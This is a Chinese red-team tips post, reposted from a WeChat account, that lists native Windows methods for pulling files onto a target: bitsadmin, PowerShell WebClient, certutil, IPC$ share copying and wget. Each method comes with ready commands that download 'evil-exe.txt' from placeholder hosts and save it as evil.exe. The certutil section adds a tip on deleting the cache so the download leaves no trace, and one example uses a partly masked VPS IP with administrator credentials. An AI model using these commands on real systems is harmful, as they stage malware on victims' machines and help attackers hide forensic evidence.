[红队TIPS]Windows远程下载文件方法

admin 2022年7月26日12:56:51评论543 views字数 2342阅读7分48秒阅读模式

前言

核心思想为不能使用要求过高, 最好是windows原生就有的, 或是使用非常方便的才记录在此


方法一 - bitsadmin

使用方法: bitsadmin /transfer n '下载地址' '保存地址'例子-下载在某个地方 bitsadmin /transfer n http://baidu.com/evil-exe.txt C:UsersmiaoDesktopevil.exe 
下载完毕以后 C:UsersmiaoDesktop 就会出现个 evil.exe


方法二 - powershell(最好是system权限)

使用方法: powershell (new-object System.Net.WebClient).DownloadFile('下载地址',['保存地址'])
例子-下载在某个地方: powershell (new-object System.Net.WebClient).DownloadFile('http://test.com/evil-exe.txt','C:evil.exe') 

下载完毕以后 C盘 根目录就会出现个 evil.exe
例子-下载在当前路径: 
powershell (new-object System.Net.WebClient).DownloadFile('http://test.com/evil-exe.txt','evil.exe')
下载完毕以后, 当前程序执行的路径在哪里文件就会保存在哪里
例如现在程序执行的路径是 C:Users 那么下载的文件就会保存在 C:Users 这个目录下面

方法三 - certutil

注意: 由于使用certutil下载文件会留下缓存,所以下载完文件以后强烈建议在删除对应的缓存

缓存目录地址: %USERPROFILE%AppDataLocalLowMicrosoftCryptnetUrlCacheContent
使用方法: 
下载文件: certutil -urlcache -split -f '下载地址' ['保存地址'] 删除缓存: certutil -urlcache -split -f '下载地址' delete
例子-下载在当前路径: 
下载文件: certutil -urlcache -split -f http://test.com/evil-exe.txt evil.exe 删除缓存: certutil -urlcache -split -f http://test.com/evil-exe.txt delete
例子-下载在某个地方: 下载文件: certutil -urlcache -split -f http://test.com/evil-exe.txt C:Usersevil.exe 删除缓存: certutil -urlcache -split -f http://test.com/evil-exe.txt delete

方法四 - ipc$文件共享

使用方法: # 建立远程IPC连接 net use \'vps-ip'ipc$ /user:'账号' '密码' 
# 复制远程文件到本地主机 copy \'vps-ip''盘符'$'下载地址' '保存地址'
windows-vps-环境 ip:220.181.38.***账号:administrator 密码:****
现在这台vpsC:Users有个user.txt内容为test
例子-通过外网vps下载文件在本机当前路径 
# 建立远程IPC连接 net use \220.181.38.***ipc$ /user:administrator ****
# 复制远程文件到本地主机 # 复制远程vps主机的文件到本机的当前路径下,执行成功以后,本机的当前路径就会出现一个test.txt文件 # 例如本机当前路径为:C:UsersAdministratorDesktop # 那么执行完下面这个命令以后就会在这个路径生成一个test.txt文件
copy \220.181.38.***c$Userstest.txt
例子-通过外网vps下载文件在本机某个目录下 
# 建立远程IPC连接 net use \220.181.38.***ipc$ /user:administrator ****

# 复制远程文件到本地主机 # 复制远程vps主机的文件到本机的C:Windows目录文件名叫test.exe copy \220.181.38.***c$Userstest.txt C:Windowstest.exe

方法五 - wget

注:这个方法不是通用的,很多情况需要我们在目标机器上面下载个东西

wget这个有点骚,很多情况下需要我们自己上传个exe,不是很符合本文章,所以要看情况使用 windows2006会自带wget命令, 所以如果是windows2006那就不用上传wget.exe文件 
直接使用 wget -O '保存地址' '下载地址' 下载文件 即可


如果有上传权限可以在目标机器上面上传个免安装的wget.exe执行程序到目标机器, 然后我们在下载文件

(注: 比较脑残我也不懂为什么有上传权限还要上传个wget.exe进行远程下载,但是指不定有人需要)


wget下载地址:https://eternallybored.org/misc/wget/


这里我也提供下载好的, 方便直接下载, zip文件里面有两个文件wget-64.exe与wget-32.exe请按自己实战需求使用


使用方法: wget-64.exe -O '保存地址' '下载地址'
例子-下载在当前路径: wget-64.exe -O "evil.exe" http://test.com/evil-exe.txt
例子-下载在某个地方: wget-64.exe wget -O "C:Usersevil.exe" http://baidu.com/evil-exe.txt



原文始发于微信公众号(白帽兔):[红队TIPS]Windows远程下载文件方法

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月26日12:56:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [红队TIPS]Windows远程下载文件方法http://cn-sec.com/archives/1201460.html

发表评论

匿名网友 填写信息